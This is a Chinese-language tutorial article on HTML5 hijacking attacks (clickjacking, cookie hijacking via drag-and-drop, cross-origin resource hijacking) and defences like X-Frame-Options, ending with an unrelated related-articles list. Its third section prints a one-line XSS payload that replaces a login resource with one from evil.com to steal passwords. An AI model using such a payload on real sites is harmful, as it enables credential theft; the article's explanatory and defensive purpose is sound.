HTML5安全风险之劫持攻击详解
(福利推荐:你还在原价购买阿里云服务器?现在阿里云0.8折限时抢购活动来啦!4核8G企业云服务器仅2998元/3年,立即抢购>>>:9i0i.cn/aliyun)
下面我们要讲到一类的HTML5安全问题,也就是劫持的问题。
一、ClickJacking-点击劫持
这种攻击方式正变得越来越普遍。被攻击的页面作为iframe,用Mask的方式设置为透明放在上层,恶意代码偷偷地放在后面的页面中,使得一个页面看起来似乎是安全的,然后诱骗用户点击网页上的内容,达到窃取用户信息或者劫持用户操作的目的。下图中,欺诈的页面放置在下层,被攻击的银行页面作为透明的层放置在上层,用户看到的是欺诈页面上显示的信息并进行输入和点击,但是真正的用户行为是发生在银行页面上的。
想象一下,点击劫持可以诱使你发布一条虚假微博、或者发送一封虚假邮件甚至盗取你的个人信息。例如下图可以诱使我们发布一条虚假的Twitter消息。
这里有一个测试工具clickjacktest可以检测你的页面是否有点击劫持的风险,你可以输入一个网址并点击Test,如果页面可以正常显示并加载,那么表示这个页面存在被点击劫持攻击的风险,如果页面显示为一片空白,那么表示页面比较安全。
二、CookieJacking-Cookie劫持
ClickJacking只涉及点击操作,但是HTML5的拖放API使得这种攻击扩大到拖放操作。因为现在Web应用里,有大量需要用户拖放完成的操作。在同源策略里,一个域的Cookie只能被本域所访问,但是拖放操作是不受同源策略限制的,这样利用拖放操作、XSS和其他技巧,可以构造跨域合法请求,劫持Cookie。
把Cookie从一个域拖拽到另外一个域里
实现原理其实和ClickJacking类似,只要欺骗用户进行拖放行为,就可以把用户某个域的信息发送到另外一个域里。这个其实很容易做到,之前有一个研究者就在Facebook上建立了一个应用,这个应用的功能是让用户把图片上美女的衣服拖拽下来。我想可能大多数人都会去尝试而且不会有警惕心理。
一个诱骗拖放的小游戏
我们应当如何防止ClickJacking、CookieJacking呢?
1、X-Frame-Options:所有的现代浏览器都支持X-Frame-Options HTTP头,这个头允许页面被iframe使用时是否正常渲染。下图中的页面就是当X-Frame-Options生效时的效果。
2、Javascript方式
这种方式非常常见,具体代码就是:
Facebook和Twitter都使用了这种方式,但是这种方式并不是完全奏效的,例如攻击者可以使用204转向或者禁用Javascript的方式来绕过(例如iframe沙箱)。
不过现在至少80%以上的网站都没有注意到点击劫持和cookie劫持的问题并加以保护。我这篇文章的主要目的就是提醒大家注意到这种隐蔽的攻击方式并有针对性的进行防御。
三、CORJacking-跨域资源劫持
CORJacking是指跨源资源劫持。HTML5应用有各种不同的资源,例如Flash文件,Silverligh,视频,音频等,这些资源可以通过DOM访问和控制。如果页面存在XSS漏洞,那么攻击者可能通过跨域资源的劫持进行攻击。例如下面的代码载入了一个swf文件,作为用户登录框,这里面我们可以实现一些加密的逻辑。
当页面存在XSS漏洞时,攻击者可以利用如下脚本把swf文件替换为欺诈的虚假资源。
document.getElementByName(‘Login’).item(0).src=‘http://evil.com/login.swf’;
那么当用户在这样的登录框里输入自己的用户名和密码并登录时,他的帐号就已经被盗取了。
这个问题在不同浏览器里面表现是不一致的,有兴趣的朋友可以下去自行测试。
相关文章
- 这篇文章主要介绍了如果不使用杀毒软件保护,您可能会面临最常见的问题,2020-02-03
- 这篇文章主要介绍了分享几个IDS开源系统,需要的朋友可以参考下2019-12-01
- 身在网站要想在微信端被使用,多多少少都会有预防被拦截,是专门为运营网站和公众号的运营者一个研究的工具几十你是正常网站,也是公司企业备案,照样也会被拦截,下面 给大2019-09-15
企业数据防泄密之举措:电脑文件加密软件还是电脑数据防泄密系统?
现在很多单位局域网都是无纸化办公,公司很多商业机密信息也是以电子文档的方式存储,那么电脑文件加密软件还是电脑数据防泄密系统?下面就跟随小编一起来了解一下2019-04-24公司数据防泄密方案之如何防止电脑文件泄露、公司电脑防止资料泄露?
公司日常办公都是通过计算机网络进行,员工日常工作中形成的重要文件都是存储在各自的电脑上,那么公司如何防止商业机密泄露、防止电脑资料泄露呢?本文就来详细的介绍一下2019-04-24- 区块链无疑是2018年的热门技术。虽然,区块链技术最受关注的应用主要在金融服务领域,其实它越来越多地影响着各个行业,迅雷链底层研发工程师张骁就区块链安全问题和密码学2018-12-26
- 迅雷链开放平台研发负责人张慧勇对区块链安全问题的特点做了详细解释,介绍了目前区块链所面临的安全问题现状、区块链安全问题的特点,以及迅雷链是如何做安全的底层设计的2018-12-26
- 在这个世界上存在着许多你根本不知道的危险角落,和一些你不敢想象的罪恶行径。小编今天带大家探讨一下罪恶天堂——暗网,一个比你想象中恐怖100倍的互联网世界。感兴趣的2018-12-03
- 网络既有可爱的一面,又有可怕的一面,不良的网站,不良的信息总会时不时的出现,不良信息屏蔽系统是校园网络信息安全的重要部分,主要功能是屏蔽网上不良信息,本文就来介2018-11-30
- 随着互联网的广泛应用,互联网逐渐成为了境外间谍情报机关窃取我国家机密的重要渠道,危害我国家安全的事件时有发生。维护网络安全和国家秘密安全,是各级涉密单位、涉密人员2018-11-28
最新评论